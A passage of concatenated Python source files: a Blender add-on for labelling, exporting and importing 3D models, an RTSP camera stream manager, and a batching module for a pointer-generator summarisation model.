return {"FINISHED"}
###############################################################################################
#### Tool panel creation class ##########################
#### With this class we create the panel that will have access to ##########################
#### all of our functionalities: Exporting the model to stl, ##########################
#### labeling each face of the model, decimating the model, adding##########################
#### tracker scaffold ##########################
###############################################################################################
class ToolsPanel(bpy.types.Panel):
### We define the name and the location of the tool
bl_label = "Magic Tools-Marker"
bl_space_type = "VIEW_3D"
bl_region_type = "TOOLS"
bl_category = "MAGIC"
def draw(self, context):
layout = self.layout
### First we define the section related to model modification
layout.label("MODIFICATION", icon="MATCUBE")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "export_model")
box.prop(context.scene, "export_model_file")
### Buttons that call for the functionalities
box.operator("magic.marker", text="Add tracker scaffold").operation = "add"
box.operator("magic.marker", text="Merge object with tracker scaffold").operation = "merge"
box.operator("magic.marker", text="Export stl printable model").operation = "stl"
box.operator("magic.marker", text="Decimate model (simplify)").operation = "decimate"
### We add an empty whitespace that separates the sections
layout.separator()
### We define the section related to the model "face labeling"
layout.label("LABELS", icon="ORTHO")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "inputLabel_hotarea")
box.prop(context.scene, "inputContent_hotarea")
box.prop(context.scene, "inputGesture_hotarea")
sub = box.row(True)
sub.prop(context.scene, "inputColor_hotarea")
### Buttons that call for the functionalities
box.operator("magic.hotarea", text="confirm").operation = "add"
box.operator("magic.hotarea", text="Delete selected area").operation = "clean"
### We add an empty whitespace that separates the sections
layout.separator()
### We define the last section, related to the model export
layout.label("EXPORT AND IMPORT", icon="FILESEL")
row = layout.row(align=True)
box = row.box()
###Input areas and labels for users
box.prop(context.scene, "inputName_model")
box.prop(context.scene, "inputIntroduction_model")
box.prop(context.scene, "export_path")
box.prop(context.scene, "import_path")
### Buttons that call for the functionalities
box.operator("magic.export", text="export")
box.operator("magic.import", text="import")
layout.separator()
layout.label("ONLINE MODELS", icon="FILESEL")
row = layout.row(align=True)
box = row.box()
box.prop(context.scene, "model_id")
box.operator("magic.online_import", text = "import")
###############################################################################################
#### MAGIC_marker operator class #######################
#### In this class we define the functions used in the Modification #######################
#### module: Add Tracker Scaffold, export to stl and decimate the model#####################
###############################################################################################
class MAGIC_marker(bpy.types.Operator):
bl_idname = "magic.marker"
bl_label = "Debugger for model modification"
bl_options = {'REGISTER', 'UNDO'}
operation = bpy.props.StringProperty()
def execute(self, context):
if self.operation == "add":
makeScaffold(self,context)
if self.operation == "merge":
mergeObjects(self,context)
if self.operation == "stl":
path = context.scene.export_model
filename = context.scene.export_model_file
if filename == ' ' or path == ' ' :
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You are missing the directory path or the name of the file you are trying to export')
bpy.ops.export_mesh.stl(filepath=path + filename + '.stl')
print("save stl " + str(time.ctime(int(time.time()))))
### We use the error dialog if the user is not selecting a single
### object to decimate
if self.operation == "decimate":
selection = bpy.context.selected_objects
if len(selection) > 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You selected more than one object')
return {'FINISHED'}
if len(selection) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='Please select one object to decimate')
return {'FINISHED'}
bpy.context.scene.objects.active = selection[0]
mod = selection[0].modifiers.new(name='decimate', type='DECIMATE')
mod.ratio = 0.1
bpy.ops.object.modifier_apply(apply_as="DATA", modifier="decimate")
return {'FINISHED'}
###############################################################################################
#### MAGIC_onlineimport operator class ########################
#### #######################
#### #####################
###############################################################################################
class MAGIC_onlineimport(bpy.types.Operator):
bl_idname = "magic.online_import"
bl_label = "online import"
bl_options = {'REGISTER', 'UNDO'}
operation = bpy.props.StringProperty()
def execute(self, context):
selection = bpy.context.selected_objects
if len(selection) >= 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You select more than one object')
return {'FINISHED'}
## we get the id of the model
modelid = context.scene.model_id
## we make the request with the id
req = requests.get('https://sensables.org/api/models/' + modelid)
str_decoded = req.content.decode()
jsonform = json.loads(str_decoded)
firstdata = jsonform['Body']['data']
ba = bytearray(firstdata)
newData = zlib.decompress(bytes(ba), 15+32)
newDat = json.loads(newData)
## Copy pasted import method
data = json.loads(newDat)
## Add each vertex to a list - Done
Vertices = []
i=0
for p in data['vertices']:
p = data['vertices'][str(i)]
vector = mathutils.Vector((p))
Vertices.append(vector)
i+=1
## Add each face to a list - Done
Faces = []
i=0
for f in data['faces']:
f = data['faces'][str(i)]['vertices']
Faces.append(f)
i+=1
## Use file name to add the new mesh
NewMesh = bpy.data.meshes.new("modelmesh")
### We define how the mesh will be built
## Use both lists to build the model
NewMesh.from_pydata \
(
Vertices,
[],
Faces
)
NewMesh.update()
context = bpy.context
## Use file name again to link it
NewObj = bpy.data.objects.new("whatever", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add the materials to the face, and also the areas.
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
### Object data
mesh = ob.data
### Here we start adding the materials
##material = makeMaterial(name=p.name, diffuse=p.color, alpha=p.diffuse)
##mesh.materials.append(material)
i=0
for p in data['materials']:
## Change all of this to makeMaterial when doing in main component
currentData = data['materials'][str(i)]
material = makeMaterial(name=currentData['name'], diffuse=currentData['color'], alpha=currentData['diffuse'])
mesh.materials.append(material)
i+=1
### Here we start adding the areas
i=0
for p in data['areas']:
currentData = data['areas'][str(i)]
ob.area_list.add()
ob.area_list[-1].area_index = currentData['area_index']
ob.area_list[-1].area_label = currentData['area_label']
ob.area_list[-1].area_content = currentData['area_content']
ob.area_list[-1].area_gesture = currentData['area_gesture']
ob.area_list[-1].area_color = currentData['area_color']
i+=1
### Here we paint all the faces depending on their index
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
i=0
for f in data['faces']:
area_index = data['faces'][str(i)]['area_index']
bm.faces[i].material_index = area_index
i+=1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.object.editmode_toggle()
return {'FINISHED'}
###############################################################################################
#### MAGIC_hotarea operator class ########################
#### In this class we define the functions used in the LABELS #######################
#### module: Add label to faces, delete all labels (need to improve #####################
###############################################################################################
class MAGIC_hotarea(bpy.types.Operator):
bl_idname = "magic.hotarea"
bl_label = "Debugger for labelling"
bl_options = {'REGISTER', 'UNDO'}
# hotareaInfoStorage = bpy.props.StringProperty()
operation = bpy.props.StringProperty()
def execute(self, context):
selection = bpy.context.selected_objects
if len(selection) > 1:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You selected more than one object, only select the object you want to label')
return {'FINISHED'}
if len(selection) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='You have to select the object you want to edit, before labelling the faces.')
return {'FINISHED'}
if self.operation == "add":
self.add(context)
if self.operation == "clean":
self.clean(context)
return {'FINISHED'}
### We define the clean function as removing all the areas of the object
def clean(self, context):
ob = bpy.context.active_object
me = ob.data
selfaces =[]
delmaterials =[]
delareas =[]
#check for edit mode
editmode = False
if ob.mode == 'EDIT':
editmode =True
#the following sets mode to object by default
bpy.ops.object.mode_set()
for f in me.polygons:
if f.select:
selfaces.append(f)
# for f in selfaces:
# hashSet for material_index
for f in selfaces:
i = 0
for a in ob.area_list:
if f.material_index == a.area_index:
if f.material_index not in delmaterials:
delmaterials.append(f.material_index)
delareas.append(i)
delareas.sort()
i = i + 1
else:
i = i + 1
else:
i = i + 1
for f in me.polygons:
if f.material_index in delmaterials:
f.material_index = 0
delareas.reverse()
q = 0
for j in delareas:
ob.area_list[delareas[q]].area_index = 0
q = q + 1
#done editing, restore edit mode if needed
if editmode:
bpy.ops.object.mode_set(mode = 'EDIT')
#selection = bpy.context.selected_objects
#obj = selection[0]
#for eachareaIndex in range(len(obj.area_list)):
# print("clean", eachareaIndex)
# obj.area_list.remove(0)
#mesh = obj.data
#mesh_editmode = bmesh.from_edit_mesh(mesh)
#for f in mesh_editmode.faces:
# if not f.material_index == 1 and not f.material_index == 2:
# f.material_index = 0
#print(obj.area_list)
def add(self, context):
selection = bpy.context.selected_objects
obj = selection[0]
mesh = obj.data
### We obtain the inputed values by the user
### to determine the name, description, gesture and color
### of the faces that the user selected to label
label = context.scene.inputLabel_hotarea
color = context.scene.inputColor_hotarea[:]
content = context.scene.inputContent_hotarea
gesture = context.scene.inputGesture_hotarea
### Activate edit mode to add label
mesh_editmode = bmesh.from_edit_mesh(mesh)
selected_faces = [p for p in mesh_editmode.faces if p.select]
### Error management if the user doesn't select at least 1 face
### of the model
if len(selected_faces) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='Please select at least one polygon')
return {'FINISHED'}
### We create a material with the color the user selected
### to add the new label
material = makeMaterial(name=label, diffuse=color[:3], alpha=color[3])
# create a mesh for the body
if len(mesh.materials) <= 0:
mesh.materials.append(makeMaterial(name="mainbody", diffuse=[1, 1, 1], alpha=1.0))
mesh.materials.append(material)
current_areas = []
for a in obj.area_list:
current_areas.append(a.area_index)
newMaterialIndex = len(mesh.materials) - 1
for f in selected_faces:
if newMaterialIndex in current_areas:
f.material_index = newMaterialIndex
else:
### If the selected face is in an area the already exists in the model
### we add it to the area
obj.area_list.add()
current_areas.append(newMaterialIndex)
f.material_index = newMaterialIndex
obj.area_list[-1].area_index = newMaterialIndex
obj.area_list[-1].area_label = label
obj.area_list[-1].area_content = content
obj.area_list[-1].area_gesture = gesture
obj.area_list[-1].area_color = color
### Add a new area and the face to the area list of the model
###############################################################################################
#### MAGIC_export operator class ########################
#### In this class we define the functions used to export the model ######################
#### module: Export and import #####################
###############################################################################################
class MAGIC_export(bpy.types.Operator):
bl_idname = "magic.export"
bl_label = "export"
def execute(self, context):
fileName = context.scene.export_path + context.scene.inputName_model
data = {}
obj = bpy.context.active_object # particular object by name
mesh = obj.data
## Obtaining vertices data
i = 0
Vertices = {}
for vert in mesh.vertices:
Vertices[i] = [vert.co.x,vert.co.y,vert.co.z]
i+=1
## Obtaining faces data
## remember to leave edit mode so
## changes reflect on the data <-- very important
j=0
Faces = {}
for face in mesh.polygons:
currentFace = []
currentNormal = []
Faces[j] = {}
for val in face.normal:
currentNormal.append(val)
for vert in face.vertices:
currentFace.append(vert)
Faces[j].update({'vertices':currentFace})
Faces[j].update({'normal':currentNormal})
j+=1
j=0
for face in mesh.polygons:
if obj.material_slots[face.material_index].name.startswith('mainBody'):
Faces[j].update({'area_index':0})
else :
Faces[j].update({'area_index':face.material_index})
j+=1
## Areas information, dictionary with the
## 5 values that compose an area data structure
j=0
Areas = {}
for a in obj.area_list:
Areas[j] = {}
Areas[j].update({'area_index': a.area_index})
Areas[j].update({'area_label': a.area_label})
Areas[j].update({'area_gesture': a.area_gesture})
Areas[j].update({'area_content':a.area_content})
color = [0,0,0,0]
color[0] = a.area_color[0]
color[1] = a.area_color[1]
color[2] = a.area_color[2]
color[3] = a.area_color[3]
Areas[j].update({'area_color':color})
j+=1
## Storing all the materials to avoid problems for now
j=0
Materials = {}
for mat in mesh.materials:
Materials[j] = {}
Materials[j].update({'name':mat.name})
Materials[j].update({'diffuse':mat.diffuse_intensity})
color = [0,0,0]
color[0] = mat.diffuse_color[0]
color[1] = mat.diffuse_color[1]
color[2] = mat.diffuse_color[2]
Materials[j].update({'color':color})
j+=1
### Find the verts for xyz surfaces to store in the json file
xz = []
yz = []
for polygon in mesh.polygons:
mat = obj.material_slots[polygon.material_index].material.name
if mat is not None:
if mat.startswith("xzFace"):
verts_in_xzFace = polygon.vertices[:]
for vert in verts_in_xzFace:
xz.append(list(obj.data.vertices[vert].co))
if mat.startswith("yzFace"):
verts_in_yzFace = polygon.vertices[:]
for vert in verts_in_yzFace:
yz.append(list(obj.data.vertices[vert].co))
## Storing data
data['vertices'] = Vertices
data['faces'] = Faces
data['materials'] = Materials
data['areas'] = Areas
data['xz'] = xz
data['yz'] = yz
data['modelname'] = context.scene.inputName_model
data['modeldescription'] = context.scene.inputIntroduction_model
thread = threading.Thread(target= writeFile(fileName,data))
thread.start()
# wait here for the result to be available before continuing
thread.join()
with open(fileName + ".json", encoding='utf8') as json_file:
dataprocess = json.load(json_file, object_pairs_hook=OrderedDict)
blenderData = []
xyz = []
marked = []
unmarked = []
vertices = []
areas = []
modelInfo = []
faceMap = {}
pointMap = {}
modelInfo.append(context.scene.inputName_model)
modelInfo.append(context.scene.inputIntroduction_model)
xyz.append(data["xz"])
xyz.append(data["yz"])
blenderData.append(xyz)
areas = [dataprocess['areas']]
vertices = [dataprocess['vertices']]
faces = dataprocess['faces']
for f in faces:
if faces[f]['area_index'] == 0:
currentface = []
currentvertices = []
currentverticesindexes = []
currentnormal = []
for v in faces[f]['vertices']:
currentvertices.append(vertices[0][str(v)])
currentverticesindexes.append(str(v))
for v in faces[f]['normal']:
currentnormal.append(v)
faceMap[f] = currentverticesindexes
currentface.append(currentvertices)
currentface.append(currentnormal)
currentface.append(f)
unmarked.append(currentface)
else:
currentface = []
generalinfo = []
color = []
currentvertices = []
currentverticesindexes = []
currentnormal = []
areaindex = faces[f]['area_index'] - 1
for v in faces[f]['vertices']:
currentverticesindexes.append(str(v))
generalinfo.append(f)
generalinfo.append(areas[0][str(areaindex)]['area_label'])
generalinfo.append(areas[0][str(areaindex)]['area_content'])
generalinfo.append(areas[0][str(areaindex)]['area_gesture'])
generalinfo.append(str(areaindex))
color.append(areas[0][str(areaindex)]['area_color'])
for v in faces[f]['vertices']:
currentvertices.append(vertices[0][str(v)])
for v in faces[f]['normal']:
currentnormal.append(v)
faceMap[f] = currentverticesindexes
currentface.append(generalinfo)
currentface.append(color[0])
currentface.append(currentvertices)
currentface.append(currentnormal)
marked.append(currentface)
blenderData.append(marked)
blenderData.append(unmarked)
blenderData.append(modelInfo)
for faceIndex in iter(faceMap):
for pointIndex in faceMap.get(faceIndex):
if pointIndex not in pointMap:
pointMap[pointIndex] = set()
pointMap.get(pointIndex).add(faceIndex)
newdata = [blenderData, faceMap, pointMap]
thread = threading.Thread(target= writeFilePickle(fileName,newdata))
thread.start()
# wait here for the result to be available before continuing
thread.join()
INPUTFILEADDRESS = fileName
OUTPUTFILEADDRESS = fileName + "processed.json"
modelData = blenderReader(INPUTFILEADDRESS)
FaceDict={}
index = 0
tempcount = 0
for eachFaceIndex in range(len(modelData.allFaces)):
eachFace = modelData.allFaces[eachFaceIndex]
templist = {}
templist['marked'] = eachFace.marked
if(eachFace.marked == True):
templist['area_id'] = eachFace.area_id
if eachFace.marked:
templist['index'] = eachFaceIndex
templist['color'] = {"r":eachFace.blender_color[0],
"g":eachFace.blender_color[1],
"b": eachFace.blender_color[2]}
tempcount = tempcount +1
else:
templist['index'] = eachFaceIndex
templist['color'] = "null"
if eachFace.label == "Body":
eachFace.label = "m_body"
if eachFace.label == "Jet engine":
eachFace.label = "m_jet"
if eachFace.label == "Cockpit":
eachFace.label = "m_cockpit"
if eachFace.label == "unmarked":
eachFace.label = "nolabel"
eachFace.content = "please activate an element with label"
templist['label'] = eachFace.label
templist['content'] = eachFace.content
templist['normal'] = {"x":eachFace.normalConverted[0],
"y":eachFace.normalConverted[1],
"z": eachFace.normalConverted[2]}
templist['verts'] = dict(vert1={'x': eachFace.vertsConverted[0][0],
'y': eachFace.vertsConverted[0][1],
'z': eachFace.vertsConverted[0][2]
},
vert2={'x': eachFace.vertsConverted[1][0],
'y': eachFace.vertsConverted[1][1],
'z': eachFace.vertsConverted[1][2]
},
vert3={'x': eachFace.vertsConverted[2][0],
'y': eachFace.vertsConverted[2][1],
'z': eachFace.vertsConverted[2][2]
})
tempIndexes = {}
count = 0
for eachNearFace in eachFace.relatedFaces:
tempIndexes[str(count)] = eachNearFace
count = count + 1
templist['nearFaces'] = tempIndexes
FaceDict['face'+str(index)]= templist
index = index +1
ExportData = {
'modelName': modelData.generalInfo[0],
'modelIntro' : modelData.generalInfo[1],
'faces' : FaceDict
}
with open(OUTPUTFILEADDRESS, 'w') as outfile:
json.dump(ExportData, outfile)
return {'FINISHED'}
###############################################################################################
#### MAGIC_import operator class ########################
#### In this class we define the functions used to import the model #######################
#### module: Export and import #####################
###############################################################################################
class MAGIC_import(bpy.types.Operator):
bl_idname = "magic.import"
bl_label = "import"
def execute(self, context):
## SUPER SPECIAL NOTE ABOUT tracker scaffold, need to select the model after the scaffold, so materials store properly.
## Import file - Done
with open(context.scene.import_path) as json_file:
data = json.load(json_file, object_pairs_hook=OrderedDict)
## Add each vertex to a list - Done
Vertices = []
i=0
for p in data['vertices']:
p = data['vertices'][str(i)]
vector = mathutils.Vector((p))
Vertices.append(vector)
i+=1
## Add each face to a list - Done
Faces = []
i=0
for f in data['faces']:
f = data['faces'][str(i)]['vertices']
Faces.append(f)
i+=1
## Use file name to add the new mesh
NewMesh = bpy.data.meshes.new("newModel")
### We define how the mesh will be built
## Use both lists to build the model
NewMesh.from_pydata \
(
Vertices,
[],
Faces
)
NewMesh.update()
context = bpy.context
## Use file name again to link it
NewObj = bpy.data.objects.new("newModel", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add the materials to the face, and also the areas.
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
### Object data
mesh = ob.data
### Here we start adding the materials
##material = makeMaterial(name=p.name, diffuse=p.color, alpha=p.diffuse)
##mesh.materials.append(material)
i=0
for p in data['materials']:
## Change all of this to makeMaterial when doing in main component
currentData = data['materials'][str(i)]
material = makeMaterial(name=currentData['name'], diffuse=currentData['color'], alpha=currentData['diffuse'])
mesh.materials.append(material)
i+=1
### Here we start adding the areas
i=0
for p in data['areas']:
currentData = data['areas'][str(i)]
ob.area_list.add()
ob.area_list[-1].area_index = currentData['area_index']
ob.area_list[-1].area_label = currentData['area_label']
ob.area_list[-1].area_content = currentData['area_content']
ob.area_list[-1].area_gesture = currentData['area_gesture']
ob.area_list[-1].area_color = currentData['area_color']
i+=1
### Here we paint all the faces depending on their index
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
i=0
for f in data['faces']:
area_index = data['faces'][str(i)]['area_index']
bm.faces[i].material_index = area_index
i+=1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.mesh.sel
bpy.ops.object.editmode_toggle()
return {'FINISHED'}
#
# Registration
# All panels and operators must be registered with Blender; otherwise
# they do not show up. The simplest way to register everything in the
# file is with a call to bpy.utils.register_module(__name__).
#
def register():
bpy.utils.register_module(__name__)
### We define the different scene properties that will be used
### to create the panel of the tool and accept user inputs
### for exporting and labelling.
bpy.types.Scene.inputName_model = bpy.props.StringProperty \
(
name="Model Name",
description="Name for the model",
default="Enter Name"
)
bpy.types.Scene.inputIntroduction_model = bpy.props.StringProperty \
(
name="Model Description",
description="Introduction for the model",
default="Enter Introduction"
)
bpy.types.Scene.inputLabel_hotarea = bpy.props.StringProperty \
(
name="Name",
description="Label for selected areas",
default="Enter Label"
)
bpy.types.Scene.inputContent_hotarea = bpy.props.StringProperty \
(
name="Description",
description="Content for selected areas",
default="Enter Content"
)
bpy.types.Scene.inputColor_hotarea = bpy.props.FloatVectorProperty(
name="Color",
subtype="COLOR",
size=4,
min=0.0,
max=1.0,
default=(0.75, 0.0, 0.8, 1.0)
)
bpy.types.Scene.inputGesture_hotarea = bpy.props.EnumProperty(
items=[('Select', 'Select', "", 3),
('Point', 'Point', "", 2),
('Cancel', 'Cancel', "", 1)],
name="Gesture")
# bpy.types.DATA_PT_display.append(hndl_draw)
bpy.types.Scene.export_path = bpy.props.StringProperty \
(
name="Output Directory",
default="",
description="Define the folder address to output the model",
subtype='DIR_PATH'
)
bpy.types.Scene.import_path = bpy.props.StringProperty \
(
name="Import File",
default="",
description="Define the file address to import the model",
subtype='FILE_PATH'
)
bpy.types.Scene.model_id = bpy.props.StringProperty \
(
name="Model ID",
default="",
description="Type in the model you want to load"
)
bpy.types.Scene.export_model = bpy.props.StringProperty \
(
name="STL directory",
default="",
description="Define the folder address of the destination",
subtype='DIR_PATH'
)
bpy.types.Scene.export_model_file = bpy.props.StringProperty \
(
name="STL filename",
default="",
description="Define the name of your STL file",
subtype='FILE_NAME'
)
bpy.types.Object.area_list = bpy.props.CollectionProperty(type=cls_AreaData)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.inputName_model
del bpy.types.Scene.inputIntroduction_model
del bpy.types.Scene.inputLabel_hotarea
del bpy.types.Scene.inputContent_hotarea
del bpy.types.Scene.inputColor_hotarea
del bpy.types.Scene.inputGesture_hotarea
del bpy.types.Scene.export_path
del bpy.types.Scene.import_path
del bpy.types.Scene.model_id
del bpy.types.Object.area_list
if __name__ == "__main__":
register()
|
models.py
|
"""App models.
"""
import logging
import threading
import time
import cv2
from configs.general_configs import PRINT_THREAD
from ..cameras.utils import normalize_rtsp, verify_rtsp
from .exceptions import StreamOpenRTSPError
logger = logging.getLogger(__name__)
# Stream
KEEP_ALIVE_THRESHOLD = 10 # Seconds
# Stream Manager
STREAM_GC_TIME_THRESHOLD = 5 # Seconds
class Stream:
"""Stream Class"""
def __init__(self, rtsp, camera_id, part_id=None):
self.rtsp = normalize_rtsp(rtsp=rtsp)
self.camera_id = camera_id
self.part_id = part_id
self.last_active = time.time()
self.status = "init"
self.cur_img_index = 0
self.last_get_img_index = 1
self.id = id(self)
# test rtsp
if not verify_rtsp(self.rtsp):
raise StreamOpenRTSPError
self.cap = cv2.VideoCapture(self.rtsp)
self.last_img = self.cap.read()[1]
def update_keep_alive(self):
"""update_keep_alive."""
self.last_active = time.time()
def gen(self):
"""generator for stream."""
self.status = "running"
logger.info("Start streaming with %s.", self.rtsp)
while self.status == "running" and (
self.last_active + KEEP_ALIVE_THRESHOLD > time.time()
):
if not self.cap.isOpened():
raise StreamOpenRTSPError
has_img, img = self.cap.read()
# Need to add the video flag FIXME
if not has_img:
self.cap = cv2.VideoCapture(self.rtsp)
time.sleep(1)
continue
img = cv2.resize(img, None, fx=0.5, fy=0.5)
self.last_active = time.time()
self.last_img = img.copy()
self.cur_img_index = (self.cur_img_index + 1) % 10000
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n"
+ cv2.imencode(".jpg", img)[1].tobytes()
+ b"\r\n"
)
self.cap.release()
logger.info("%s cap released.", self)
def get_frame(self):
"""get_frame."""
logger.info("%s get frame.", self)
# b, img = self.cap.read()
time_begin = time.time()
while True:
if time.time() - time_begin > 5:
break
if self.last_get_img_index == self.cur_img_index:
time.sleep(0.01)
else:
break
self.last_get_img_index = self.cur_img_index
img = self.last_img.copy()
# if b: return cv2.imencode('.jpg', img)[1].tobytes()
# else : return None
return cv2.imencode(".jpg", img)[1].tobytes()
def close(self):
"""close.
close the stream.
"""
self.status = "stopped"
logger.info("%s stopped.", self)
def __str__(self):
return f"<Stream id:{self.id} rtsp:{self.rtsp}>"
def __repr__(self):
return f"<Stream id:{self.id} rtsp:{self.rtsp}>"
class StreamManager:
"""StreamManager"""
def __init__(self):
self.streams = []
self.mutex = threading.Lock()
self.gc()
def add(self, stream: Stream):
"""add stream"""
self.mutex.acquire()
self.streams.append(stream)
self.mutex.release()
def get_stream_by_id(self, stream_id):
"""get_stream_by_id"""
self.mutex.acquire()
for i in range(len(self.streams)):
stream = self.streams[i]
if stream.id == stream_id:
self.mutex.release()
return stream
self.mutex.release()
return None
def gc(self):
"""Garbage collector
IMPORTANT, autoreloader will not reload threading,
please restart the server if you modify the thread
"""
def _gc(self):
while True:
self.mutex.acquire()
if PRINT_THREAD:
logger.info("streams: %s", self.streams)
to_delete = []
for stream in self.streams:
if stream.last_active + STREAM_GC_TIME_THRESHOLD < time.time():
# stop the inactive stream
# (the ones users didnt click disconnect)
logger.info("stream %s inactive", stream)
logger.info("Time now %s", time.time())
logger.info("Stream alive through %s", stream.last_active)
stream.close()
# collect the stream, to delete later
to_delete.append(stream)
for stream in to_delete:
self.streams.remove(stream)
self.mutex.release()
time.sleep(3)
threading.Thread(target=_gc, args=(self,), daemon=True).start()
|
batcher.py
|
# Most of this file is copied form https://github.com/abisee/pointer-generator/blob/master/batcher.py
import queue as Queue
import time
from random import shuffle
from threading import Thread
import numpy as np
import config
import data
import random
random.seed(1234)
class Example(object):
def __init__(self, article, abstract_sentences, vocab):
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > config.max_enc_steps:
article_words = article_words[:config.max_enc_steps]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences)
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, config.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if config.pointer_gen:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
# Get a verison of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
# NOTE: dec_input does not contain article OOV ids!!!!
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, config.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
def pad_decoder_inp_targ(self, max_len, pad_id):
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if config.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
def __init__(self, example_list, vocab, batch_size):
self.batch_size = batch_size
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list) # initialize the input to the encoder
self.init_decoder_seq(example_list) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list):
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((self.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if config.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list):
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(config.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
self.dec_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.float32)
self.dec_lens = np.zeros((self.batch_size), dtype=np.int32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
self.dec_lens[i] = ex.dec_len
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list]
class Batcher(object):
